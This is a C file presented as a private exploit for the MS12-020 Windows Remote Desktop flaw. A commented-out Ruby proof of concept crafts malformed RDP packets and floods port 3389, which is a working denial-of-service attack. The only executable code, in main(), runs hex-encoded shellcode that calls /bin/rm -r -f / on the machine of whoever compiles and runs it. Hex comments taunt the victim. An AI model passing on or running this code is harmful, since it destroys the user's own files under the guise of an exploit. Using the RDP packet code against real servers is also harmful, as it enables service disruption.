ms12-020_PRIVATE.c

1. ## ms12-020.c
2. # change offset in main before compiling
3. # 64bit shellcode available soon
4. /*
5. require 'socket'
6.  
7. def send_tpkt(sd, data)
8. sd.write(make_tpkt(data))
9. end
10.  
11. def make_tpkt(data)
12. [
13. 3, # version
14. 0, # reserved
15. 4 + data.length
16. ].pack('CCn') + data
17. end
18.  
19. def make_x224(data)
20. [ data.length ].pack('C') + data
21. end
22.  
23. def make_rdp(type, flags, data)
24. [ type, flags, 4 + data.length ].pack('CCv') + data
25. end
26.  
27. host = ARGV.shift
28.  
29. sd = TCPSocket.new(host, 3389)
30. pkts1 = []
31.  
32. # craft connection request
33. rdp = make_rdp(1, 0, [ 0 ].pack('V'))
34. x224_1 = make_x224([
35. 0xe0, # Connection request
36. 0, # ??
37. 0, # SRC-REF
38. 0 # Class : Class 0
39. ].pack('CnnC') + rdp)
40.  
41. pkts1 << make_tpkt(x224_1)
42.  
43. # craft connect-initial
44. x224_2 = make_x224([
45. 0xf0, # Data / Class 0
46. 0x80 # EOT: True / NR: 0
47. ].pack('CC'))
48.  
49. # mcsCi
50. target_params = ""+
51. #"\x02\x01\x00"+ # maxChannelIds
52. "\x02\x01\x22"+ # maxChannelIds
53. "\x02\x01\x0a"+ # maxUserIds
54. "\x02\x01\x00"+ # maxTokenIds
55. "\x02\x01\x01"+ # numPriorities
56. "\x02\x01\x00"+ # minThroughput
57. "\x02\x01\x01"+ # maxHeight
58. "\x02\x02\xff\xff"+ # maxMCSPDUSize
59. "\x02\x01\x02" # protocolVersion
60. min_params = ""+
61. "\x02\x01\x01"+ # maxChannelIds
62. "\x02\x01\x01"+ # maxUserIds
63. "\x02\x01\x01"+ # maxTokenIds
64. "\x02\x01\x01"+ # numPriorities
65. "\x02\x01\x00"+ # minThroughput
66. "\x02\x01\x01"+ # maxHeight
67. "\x02\x02\x04\x20"+ # maxMCSPDUSize
68. "\x02\x01\x02" # protocolVersion
69. max_params = ""+
70. "\x02\x02\xff\xff"+ # maxChannelIds
71. "\x02\x02\xfc\x17"+ # maxUserIds
72. "\x02\x02\xff\xff"+ # maxTokenIds
73. "\x02\x01\x01"+ # numPriorities
74. "\x02\x01\x00"+ # minThroughput
75. "\x02\x01\x01"+ # maxHeight
76. "\x02\x02\xff\xff"+ # maxMCSPDUSize
77. "\x02\x01\x02" # protocolVersion
78.  
79. userdata = ""+
80. # gccCCrq
81. "\x00\x05\x00\x14"+
82. "\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
83. # clientCoreData
84. "\x01\xc0"+"\xd8\x00"+ # header (type, len)
85. "\x04\x00"+"\x08\x00"+ # version
86. "\x80\x02"+ # desktop width
87. "\xe0\x01"+ # desktop height
88. "\x01\xca"+ # color depth
89. "\x03\xaa"+ # SASSequence
90. "\x09\x04\x00\x00" + # keyboard layout
91. "\xce\x0e\x00\x00" + # client build number
92. # client name
93. "\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
94. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
95. "\x04\x00\x00\x00"+ # keyboard type
96. "\x00\x00\x00\x00"+ # kbd subType
97. "\x0c\x00\x00\x00"+ # kbd FuncKey
98. # imeFileName
99. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
100. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
101. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
102. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
103. "\x01\xca"+ # postBeta2ColorDepth
104. "\x01\x00"+ # clientProductId
105. "\x00\x00\x00\x00" + # serialNumber
106. "\x10\x00"+ # highColorDepth
107. "\x07\x00"+ # supportedColorDepths
108. "\x01\x00"+ # earlyCapabilityFlags
109. # clientDigProductId -poc has: "00000-000-0000000-00000"
110. "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
111. "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
112. "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
113. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
114. "\x00"+ # connectionType
115. "\x00"+ # pad1octet
116. "\x00\x00\x00\x00"+ # serverSelectedProtocol
117. "\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
118. "\x0d\x00\x00\x00"+ # desktopPhysicalHeight
119. "\x00\x00\x00\x00"+ # reserved
120. # clientSecurityData
121. "\x02\xc0"+"\x0c\x00"+ # header (type, len)
122. "\x1b\x00\x00\x00"+ # encryptionMethods
123. "\x00\x00\x00\x00"+ # extEncryptionMethods
124. # clientNetworkData
125. "\x03\xc0"+"\x2c\x00"+ # header (type, len)
126. "\x03\x00\x00\x00"+ # channel count!
127. # channel 0
128. "rdpdr\x00\x00\x00"+ # name
129. "\x00\x00\x80\x80"+ # options
130. # channel 1
131. "cliprdr\x00"+ # name
132. "\x00\x00\xa0\xc0"+ # options
133. # channel 2
134. "rdpsnd\x00\x00"+ # name
135. "\x00\x00\x00\xc0" # options
136. # clientClusterData (not present)
137. # clientMonitorData (not present)
138.  
139. mcs_data = ""+
140. "\x04\x01\x01"+ # callingDomainSelector
141. "\x04\x01\x01"+ # calledDomainSelector
142. "\x01\x01\xff"+ # upwardFlag
143. "\x30" + [ target_params.length ].pack('C') + target_params +
144. "\x30\x41\x41" + [ min_params.length ].pack('C') + min_params +
145. "\x30" + [ max_params.length ].pack('C') + max_params +
146. # userData
147. "\x04\x82" + [ userdata.length ].pack('n') + userdata
148.  
149. mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length
150. mcs << mcs_data
151.  
152. pkts1 << make_tpkt(x224_2 + mcs)
153.  
154. # send a special one?
155. #pkts1 << &nerf <<*zarfoo << make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")
156.  
157. # send more pkts! - based on poc
158. 8.times {
159. pkts1 << make_tpkt(x224_2 + "\x28")
160. }
161.  
162. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xea")
163. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xeb")
164. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xec")
165. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xed")
166. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xee")
167. pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0")
168. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf1")
169. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf2")
170. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf3")
171.  
172. pkts1 << make_tpkt(x224_2 + "\x21\x80")
173.  
174. bigpkt = pkts1.join('')
175.  
176. 20.times { |x|
177. puts "[*] Sending #{x + 1} ..."
178. sd.write(bigpkt)
179.  
180. send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")
181. #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
182. #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")
183. #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")
184.  
185. # read connect-initial response
186. buf = sd.recv(1500)
187. # XXX: TODO: check response =)
188. #puts buf
189. }
190.  
191. sd.close
192. */
193.  
194. #\x64\x69\x65\x20\x73\x6b\x69\x64\x64\x69\x65\x20\x73\x63\x75\x6d
195. #\x65\x6e\x6a\x6f\x79\x20\x79\x6f\x75\x72\x20\x72\x6d
196. main()
197. {
198. char shellcode[] =
199. "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
200. "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
201. "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
202.  
203. (*(void (*)()) shellcode)();
204. }